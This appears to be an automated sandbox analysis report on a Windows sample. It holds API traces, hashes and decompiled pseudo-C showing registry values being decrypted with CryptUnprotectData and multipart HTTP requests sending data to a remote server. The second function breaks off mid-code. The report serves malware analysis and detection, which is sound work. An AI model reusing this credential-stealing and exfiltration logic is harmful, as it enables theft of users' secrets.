0x0040c529
0x0040c534
0x0040c535
0x0040c540
0x0040c543
0x0040c543
0x0040c54e
0x0040c55b
0x0040c563
0x0040c570
0x0040c578
0x0040c585
0x0040c58d
0x0040c59a
0x0040c5a2
0x0040c5af
0x0040c5b7
0x0040c5c4
0x0040c5cc
0x0040c5d9
0x0040c5e1
0x0040c5ee
0x0040c5f6
0x0040c603
0x0040c60b
0x0040c618
0x0040c620
0x0040c62d
0x0040c635
0x0040c642
0x0040c64a
0x0040c657
0x0040c65f
0x0040c66c
0x0040c674
0x0040c681
0x0040c689
0x0040c696
0x0040c69e
0x0040c6ab
0x0040c6b3
0x0040c6c0
0x0040c6c8
0x0040c6d5
0x0040c6dd
0x0040c6ea
0x0040c6f2
0x0040c6ff
0x0040c707
0x0040c714
0x0040c71c
0x0040c729
0x0040c731
0x0040c73e
0x0040c74c

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00000000,?,?,0040CC5C), ref: 0040BB2F
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0040BB36
lstrcat.KERNEL32(?), ref: 0040BD44
lstrcat.KERNEL32(?,?), ref: 0040BD58
lstrcat.KERNEL32(?,?), ref: 0040BD6C
lstrcat.KERNEL32(?,?), ref: 0040BD80
lstrcat.KERNEL32(?), ref: 0040BD93
lstrcat.KERNEL32(?), ref: 0040BDA6
lstrcat.KERNEL32(?), ref: 0040BDB9
lstrcat.KERNEL32(?), ref: 0040BDCC
lstrcat.KERNEL32(?), ref: 0040BDDF
lstrcat.KERNEL32(?,?), ref: 0040BDF3
lstrcat.KERNEL32(?,?), ref: 0040BE07
lstrcat.KERNEL32(?,?), ref: 0040BE1B
lstrcat.KERNEL32(?), ref: 0040BE2E
lstrcat.KERNEL32(?), ref: 0040BE41
lstrcat.KERNEL32(?), ref: 0040BE54
lstrcat.KERNEL32(?), ref: 0040BE67
lstrcat.KERNEL32(?), ref: 0040BE7A
lstrcat.KERNEL32(?,?), ref: 0040BE8E
lstrcat.KERNEL32(?,?), ref: 0040BEA2
lstrcat.KERNEL32(?,?), ref: 0040BEB6
lstrcat.KERNEL32(?), ref: 0040BEC9
lstrcat.KERNEL32(?), ref: 0040BEDC
lstrcat.KERNEL32(?), ref: 0040BEEF
lstrcat.KERNEL32(?), ref: 0040BF02
lstrcat.KERNEL32(?), ref: 0040BF15
lstrcat.KERNEL32(?,?), ref: 0040BF29
lstrcat.KERNEL32(?,?), ref: 0040BF3D
lstrcat.KERNEL32(?,?), ref: 0040BF51
lstrcat.KERNEL32(?), ref: 0040BF64
lstrcat.KERNEL32(?), ref: 0040BF77
lstrcat.KERNEL32(?), ref: 0040BF8A
lstrcat.KERNEL32(?), ref: 0040BF9D
lstrcat.KERNEL32(?), ref: 0040BFB0
lstrcat.KERNEL32(?,?), ref: 0040BFC4
lstrcat.KERNEL32(?,?), ref: 0040BFD8
lstrcat.KERNEL32(?,?), ref: 0040BFEC
lstrcat.KERNEL32(?), ref: 0040BFFF
lstrcat.KERNEL32(?), ref: 0040C012
lstrcat.KERNEL32(?), ref: 0040C025
lstrcat.KERNEL32(?), ref: 0040C038
lstrcat.KERNEL32(?), ref: 0040C04B
lstrcat.KERNEL32(?,?), ref: 0040C05F
lstrcat.KERNEL32(?,?), ref: 0040C073
lstrcat.KERNEL32(?,?), ref: 0040C087
lstrcat.KERNEL32(?), ref: 0040C09A
lstrcat.KERNEL32(?), ref: 0040C0AD
lstrcat.KERNEL32(?), ref: 0040C0C0
lstrcat.KERNEL32(?), ref: 0040C0D3
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C0F4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C11D
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C146
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C16F
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C198
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C1C1
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C213
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C23C
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C265
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C28E
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C2B7
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C2E0
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C332
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C35B
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C384
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C3AD
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C3D6
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C3FF
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C428
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C451
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C47A
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C4A3
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,0040CC5C,?,00000000,?,?,0040CC5C), ref: 0040C309

Part of subcall function 0040B967: wsprintfA.USER32 ref: 0040BAB1
Part of subcall function 0040B967: lstrcat.KERNEL32(000000FF,?), ref: 0040BAC4
Part of subcall function 0040B967: lstrcat.KERNEL32(000000FF,00412120), ref: 0040BAD2
Part of subcall function 0040B967: RegEnumValueA.ADVAPI32(?,00000000,?,000000FF,00000000,00000003,?,?), ref: 0040BB04

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?,?,00000000,?,?,0040CC5C), ref: 0040C1EA

Part of subcall function 0040B967: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,0040CC5C,?,?,00000000), ref: 0040B9AB
Part of subcall function 0040B967: lstrcat.KERNEL32(000000FF,?), ref: 0040B9CA
Part of subcall function 0040B967: lstrcat.KERNEL32(000000FF,0041217C), ref: 0040B9D8
Part of subcall function 0040B967: StrStrA.SHLWAPI(?), ref: 0040B9F5
Part of subcall function 0040B967: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040BA09
Part of subcall function 0040B967: RtlAllocateHeap.NTDLL(00000000), ref: 0040BA10
Part of subcall function 0040B967: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BA34
Part of subcall function 0040B967: WideCharToMultiByte.KERNEL32(00000000,00000000,0040CC5C,?,?,00000400,00000000,00000000), ref: 0040BA4D
Part of subcall function 0040B967: LocalFree.KERNEL32(0040CC5C), ref: 0040BA56
Part of subcall function 0040B967: lstrcpy.KERNEL32(?,0040FBE1), ref: 0040BA6B
Part of subcall function 0040B967: GetProcessHeap.KERNEL32(00000000,0040FBE1), ref: 0040BA73
Part of subcall function 0040B967: HeapFree.KERNEL32(00000000), ref: 0040BA7A
Part of subcall function 0040B967: lstrcat.KERNEL32(000000FF,?), ref: 0040BA8A
Part of subcall function 0040B967: lstrcpy.KERNEL32(?,0040FBE1), ref: 0040BA9C

lstrcat.KERNEL32(?), ref: 0040C4DD
lstrcat.KERNEL32(?), ref: 0040C4F0
lstrlen.KERNEL32(?,?,00000000,?,?,0040CC5C), ref: 0040C4F9
lstrlen.KERNEL32(?,?,00000000,?,?,0040CC5C), ref: 0040C506

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$Open$Heap$Process$AllocateEnumFreeValuelstrcpylstrlen$ByteCharCryptDataLocalMultiUnprotectWidewsprintf
String ID:
API String ID: 1042928851-0
Opcode ID: 7a1343108bd73eb39c5e01d7164ec9e24ec50e4f2d5fc80483da065e2d8ff247
Instruction ID: dddb8bda35320b962eb4348dd9b0c8abfad1d1dcbaec76ff3a48f45b2e812bbb
Opcode Fuzzy Hash: 7a1343108bd73eb39c5e01d7164ec9e24ec50e4f2d5fc80483da065e2d8ff247
Instruction Fuzzy Hash: FA82E5B290016DFFDF55CBA0DD849DEBBBDEB48300F2485A7A605E2250EB34AB449F54

Uniqueness

Uniqueness Score: -1.00%

Function 00403721 Relevance: 45.9, APIs: 22, Strings: 4, Instructions: 443
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00403721(void* __ecx, void* __eflags, intOrPtr _a4, char _a8, char _a20, intOrPtr _a88, intOrPtr _a100, intOrPtr _a104) {
				void* _v16;
				char _v28;
				char _v32;
				char _v36;
				int _v40;
				char _v44;
				void* _v48;
				long _v52;
				void* _v56;
				void* _v60;
				char _v72;
				char _v84;
				int _v96;
				char* _v108;
				char _v120;
				char _v132;
				char _v144;
				char* _v160;
				short _v180;
				char* _v188;
				intOrPtr _v200;
				void _v204;
				char _v264;
				void _v2264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t192;
				void* _t204;
				void* _t233;
				void* _t260;
				void* _t261;
				void* _t373;
				void* _t376;
				long _t387;
				void* _t395;
				signed int _t403;
				void* _t408;
				void* _t409;
				signed int _t411;
				void* _t417;
				long _t435;
				void* _t507;
				void* _t508;
				void* _t509;
				void* _t512;

				_t518 = __eflags;
				_t509 = _t508 - 0xc;
				E0040EA82( &_a8, __ecx, _t509, __eflags);
				_t192 = E00403093(); // executed
				_t411 = 0xf;
				_t403 = 0;
				memcpy( &_v204, _t192, _t411 << 2);
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v36 = 0;
				E0040D983(0,  &_v32,  &_v40, _a100, _a104); // executed
				E0040D983(0,  &_v44,  &_v36, _a88,  *0x61367c(_a88,  &_v264));
				_t512 = _t509 + 0x34;
				E0040EA50(_a4, _t518, 0x40fbe1);
				E0040EA50( &_v72, _t518, 0x40fbe1);
				E0040EA50( &_v16, _t518, 0x40fbe1);
				E0040EA50( &_v96, _t518, 0x40fbe1);
				E0040EA50( &_v108, _t518, 0x40fbe1);
				_t204 = InternetOpenA(0, 1, 0, 0, 0);
				_push( *0x6133c0);
				_v60 = _t204;
				_push(_v200);
				if( *0x613784() == 0) {
					_t403 = 1;
				}
				_t521 = _v60;
				if(_v60 != 0) {
					_t233 = E0040D800(_t403,  &_v120, _t521, 0x14);
					_pop(_t417);
					E0040EAEF(E0040EB29( &_v72, _t417, _t233,  &_v132, _t521), _t417,  &_v72);
					E004016EF(_v132);
					E004016EF(_v120);
					E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B( &_v96, _t417,  &_v144, _t521, "\r\n------"), _t417,  &_v72,  &_v132, _t521), _t417,  &_v120, _t521, "--\r\n"), _t417,  &_v96);
					E004016EF(_v120);
					E004016EF(_v132);
					E004016EF(_v144);
					E0040EAEF(E0040EB29(E0040EB6B( &_v108, _t417,  &_v28, _t521,  *0x613070), _t417,  &_v72,  &_v84, _t521), _t417,  &_v108);
					E004016EF(_v84);
					E004016EF(_v28);
					_t260 = InternetConnectA(_v60, _v188, _v180, 0, 0, 3, 0, 0);
					_v56 = _t260;
					if(_t260 != 0) {
						asm("sbb ebx, ebx");
						_t261 = HttpOpenRequestA(_t260,  *0x6133dc, _v160,  *0x613208, 0, 0, ( ~_t403 & 0x00800000) + 0x400100, 0); // executed
						_v52 = _t261;
						_t523 = _t261;
						if(_t261 != 0) {
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
							E004016EF(_v28);
							_t407 = "\r\n";
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v84, _t523,  *0x61323c), _t417,  &_v16);
							E004016EF(_v84);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523,  *0x6133b4), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, _t417,  &_a20,  &_v28, _t523), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v84, _t523,  *0x61323c), _t417,  &_v16);
							E004016EF(_v84);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523,  *0x61333c), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, _v36), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, _t407), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, _t407), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v84, _t523,  *0x61323c), _t417,  &_v16);
							E004016EF(_v84);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523,  *0x613034), _t417,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
							E004016EF(_v28);
							_t373 =  *0x61367c(_v96);
							_t408 = _v16;
							_t435 = _t373 + _v32 +  *0x61367c(_t408);
							_t376 = RtlAllocateHeap(GetProcessHeap(), 0, _t435); // executed
							_v48 = _t376;
							memcpy(_v48, _t408,  *0x61367c(_t408));
							memcpy(_v48 +  *0x61367c(_v32), _t408, _v40);
							memcpy(_v48 +  *0x61367c( *0x61367c(_v96)) + _v32, _t408, _v96);
							_t387 =  *0x61367c(_t435);
							_t409 = _v52;
							HttpSendRequestA(_t409, _v108, _t387, _v108, _v48);
							_v52 =  &_v48;
							memset(_v52, 0, 4 << 0);
							_t512 = _t512 + 0x30;
							while(InternetReadFile(_t409,  &_v2264, 0x7cf,  &_v52) != 0) {
								_t395 = _v52;
								__eflags = _t395;
								if(__eflags != 0) {
									 *((char*)(_t507 + _t395 - 0x8d4)) = 0;
									E0040EAEF(E0040EB6B(_a4, 0,  &_v144, __eflags,  &_v2264), 0, _a4);
									E004016EF(_v144);
									continue;
								}
								break;
							}
							InternetCloseHandle(_t409);
						}
						InternetCloseHandle(_v56);
					}
				}
				InternetCloseHandle(_v60);
				_v56 =  &_v40;
				memset(_v56, 0, 4 << 0);
				_v56 =  &_v36;
				memset(_v56, 0, 4 << 0);
				E004016EF(_v72);
				E004016EF(_v16);
				E004016EF(_v96);
				E004016EF(_v108);
				E004016EF(0);
				E004016EF(0);
				E004016EF(0);
				E004016EF(0);
				E00401562( &_a8);
				E004016EF(_a88);
				return _a4;
			}

0x00403721
0x0040372d
0x00403735
0x00403741
0x00403748
0x00403751
0x00403759
0x00403762
0x00403765
0x00403768
0x0040376b
0x0040376e
0x00403789
0x00403791
0x0040379a
0x004037a3
0x004037ac
0x004037b5
0x004037be
0x004037c9
0x004037cf
0x004037d5
0x004037d8
0x004037e6
0x004037e8
0x004037e8
0x004037e9
0x004037ed
0x004037f8
0x004037ff
0x0040380e
0x00403816
0x0040381e
0x00403851
0x00403859
0x00403861
0x0040386c
0x0040388d
0x00403895
0x0040389d
0x004038b9
0x004038bf
0x004038c4
0x004038cd
0x004038f1
0x004038f7
0x004038fa
0x004038fc
0x00403915
0x0040391d
0x00403930
0x00403938
0x0040393d
0x00403951
0x00403959
0x00403972
0x0040397a
0x00403993
0x0040399b
0x004039b3
0x004039bb
0x004039d1
0x004039d9
0x004039ed
0x004039f5
0x00403a0d
0x00403a15
0x00403a2b
0x00403a33
0x00403a47
0x00403a4f
0x00403a68
0x00403a70
0x00403a89
0x00403a91
0x00403aa9
0x00403ab1
0x00403ac7
0x00403acf
0x00403ae3
0x00403aeb
0x00403b03
0x00403b0b
0x00403b1e
0x00403b26
0x00403b3a
0x00403b42
0x00403b5b
0x00403b63
0x00403b7c
0x00403b84
0x00403b9c
0x00403ba4
0x00403bac
0x00403bb2
0x00403bc1
0x00403bcd
0x00403bd4
0x00403be8
0x00403bfe
0x00403c1e
0x00403c2a
0x00403c30
0x00403c38
0x00403c41
0x00403c4e
0x00403c4e
0x00403c8e
0x00403c57
0x00403c5a
0x00403c5c
0x00403c5e
0x00403c7e
0x00403c89
0x00000000
0x00403c89
0x00000000
0x00403c5c
0x00403ca6
0x00403ca6
0x00403caf
0x00403caf
0x004038c4
0x00403cb8
0x00403cc1
0x00403cce
0x00403cd3
0x00403ce0
0x00403ce5
0x00403ced
0x00403cf5
0x00403cfd
0x00403d04
0x00403d0b
0x00403d12
0x00403d19
0x00403d21
0x00403d29
0x00403d35

APIs

Part of subcall function 0040EA82: lstrcpy.KERNEL32(00000000,?), ref: 0040EAA1

Part of subcall function 00403093: malloc.MSVCRT ref: 004030C5
Part of subcall function 00403093: malloc.MSVCRT ref: 004030CB
Part of subcall function 00403093: malloc.MSVCRT ref: 004030D1
Part of subcall function 00403093: lstrlen.KERNEL32(000000FF,00000000,?), ref: 004030E3
Part of subcall function 00403093: InternetCrackUrlA.WININET(000000FF,00000000), ref: 004030EB

lstrlen.KERNEL32(?), ref: 0040377A

Part of subcall function 0040D983: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040D9A3
Part of subcall function 0040D983: GetProcessHeap.KERNEL32(00000000,?,?,00403773,?,?,?,?,?,?,?), ref: 0040D9B0
Part of subcall function 0040D983: RtlAllocateHeap.NTDLL(00000000,?,00403773), ref: 0040D9B7

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004037C9
StrCmpCA.SHLWAPI(?), ref: 004037DE
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004038B9
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,-00400100,00000000), ref: 004038F1

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

lstrlen.KERNEL32(?,",004120A8,------,004120A8,?,",004120A8,------,004120A8,",004120A8,------), ref: 00403BAC
lstrlen.KERNEL32(?), ref: 00403BB8
GetProcessHeap.KERNEL32(00000000,?), ref: 00403BC6
RtlAllocateHeap.NTDLL(00000000), ref: 00403BCD
lstrlen.KERNEL32(?), ref: 00403BD7
memcpy.MSVCRT ref: 00403BE8
lstrlen.KERNEL32(?,?,?), ref: 00403BF4
memcpy.MSVCRT ref: 00403BFE
lstrlen.KERNEL32(?), ref: 00403C06
lstrlen.KERNEL32(?,?,00000000), ref: 00403C11
memcpy.MSVCRT ref: 00403C1E
lstrlen.KERNEL32(?,?,?), ref: 00403C2A
HttpSendRequestA.WININET(?,?,00000000), ref: 00403C38
InternetReadFile.WININET(?,?,000007CF,?), ref: 00403C9B
InternetCloseHandle.WININET(?), ref: 00403CA6
InternetCloseHandle.WININET(?), ref: 00403CAF
InternetCloseHandle.WININET(00000000), ref: 00403CB8

Strings

", xrefs: 004039A0, 00403A96, 00403B89
------, xrefs: 00403828
--, xrefs: 00403823
------, xrefs: 00403902, 004039FA, 00403AF0

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$Heap$CloseHandlemallocmemcpy$AllocateHttpOpenProcessRequestlstrcat$BinaryConnectCrackCryptFileReadSendString
String ID: ------$"$--$------
API String ID: 508137646-1406108388
Opcode ID: afd844f8db6cc31201eaae1d41d90493e2dd7496407c6afaba09c3a8813adf96
Instruction ID: 4cc966570f3d97b5f190e4a128bd293b6c09c56ae8829809b159362b6c592470
Opcode Fuzzy Hash: afd844f8db6cc31201eaae1d41d90493e2dd7496407c6afaba09c3a8813adf96
Instruction Fuzzy Hash: 0F02EA71D00019ABCF00FBA6DC829DEBBB5EF04308F544576B601B72A1D7396E5ACB98

Uniqueness

Uniqueness Score: -1.00%

Function 00403D36 Relevance: 37.1, APIs: 19, Strings: 2, Instructions: 388
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00403D36(void* __ecx, void* __eflags, intOrPtr* _a4, char _a8, char _a20, char _a88) {
				void* _v16;
				char _v28;
				long _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v56;
				int _v68;
				void* _v72;
				char _v84;
				char* _v96;
				char _v108;
				char* _v124;
				short _v144;
				char* _v152;
				intOrPtr _v164;
				void _v168;
				void _v368;
				char _v428;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t168;
				void* _t175;
				void* _t179;
				void* _t204;
				void* _t245;
				void* _t250;
				void* _t327;
				long _t330;
				long _t337;
				int _t341;
				long _t342;
				void* _t350;
				long _t353;
				void* _t354;
				signed int _t356;
				void* _t358;
				long _t441;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t448;

				_t452 = __eflags;
				_t446 = _t445 - 0xc;
				E0040EA82( &_a8, __ecx, _t446, __eflags);
				_push( &_v428); // executed
				_t168 = E00403093(); // executed
				_t356 = 0xf;
				memcpy( &_v168, _t168, _t356 << 2);
				_t448 = _t446 + 0x1c;
				E0040EA50(_a4, _t452, 0x40fbe1);
				E0040EA50( &_v84, _t452, 0x40fbe1);
				E0040EA50( &_v16, _t452, 0x40fbe1);
				E0040EA50( &_v68, _t452, 0x40fbe1);
				E0040EA50( &_v96, _t452, 0x40fbe1);
				_t175 = InternetOpenA(0, 1, 0, 0, 0);
				_push( *0x6133c0);
				_v72 = _t175;
				_push(_v164);
				_v32 = 0;
				if( *0x613784() == 0) {
					_v32 = 1;
				}
				_t454 = _v72;
				if(_v72 != 0) {
					_t204 = E0040D800(_t350,  &_v56, _t454, 0x14);
					_pop(0);
					E0040EAEF(E0040EB29( &_v84, 0, _t204,  &_v108, _t454), 0,  &_v84);
					E004016EF(_v108);
					E004016EF(_v56);
					_t352 = "\r\n";
					E0040EAEF(E0040EB6B( &_v68, 0,  &_v56, _t454, "\r\n"), 0,  &_v68);
					E004016EF(_v56);
					E0040EAEF(E0040EB6B( &_v68, 0,  &_v56, _t454, "------"), 0,  &_v68);
					E004016EF(_v56);
					E0040EAEF(E0040EB29( &_v68, 0,  &_v84,  &_v56, _t454), 0,  &_v68);
					E004016EF(_v56);
					E0040EAEF(E0040EB6B( &_v68, 0,  &_v56, _t454, "--"), 0,  &_v68);
					E004016EF(_v56);
					E0040EAEF(E0040EB6B( &_v68, 0,  &_v56, _t454, "\r\n"), 0,  &_v68);
					E004016EF(_v56);
					E0040EAEF(E0040EB29(E0040EB6B( &_v96, 0,  &_v28, _t454,  *0x613070), 0,  &_v84,  &_v108, _t454), 0,  &_v96);
					E004016EF(_v108);
					E004016EF(_v28);
					_t245 = InternetConnectA(_v72, _v152, _v144, 0, 0, 3, 0, 0);
					_v36 = _t245;
					if(_t245 != 0) {
						asm("sbb eax, eax");
						_t250 = HttpOpenRequestA(_v36,  *0x6133dc, _v124,  *0x613208, 0, 0, ( ~_v32 & 0x00800000) + 0x400100, 0);
						_v32 = _t250;
						_t456 = _t250;
						if(_t250 != 0) {
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t456, "------"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, 0,  &_v84,  &_v28, _t456), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v56, _t456,  *0x61323c), 0,  &_v16);
							E004016EF(_v56);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t456,  *0x6133b4), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t456, "\"\r\n\r\n"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, 0,  &_a20,  &_v28, _t456), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t456, "------"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, 0,  &_v84,  &_v28, _t456), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v56, _t456,  *0x61323c), 0,  &_v16);
							E004016EF(_v56);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t456,  *0x613050), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t456, "\"\r\n\r\n"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, 0,  &_a88,  &_v28, _t456), 0,  &_v16);
							E004016EF(_v28);
							_t327 =  *0x61367c(_v68);
							_t441 = _t327 +  *0x61367c(_v16);
							_t330 = RtlAllocateHeap(GetProcessHeap(), 0, _t441);
							_t353 = _t330;
							memcpy(_t353, _v16,  *0x61367c(_v16));
							memcpy( *0x61367c( *0x61367c(_v68)) + _t353, _v16, _v68);
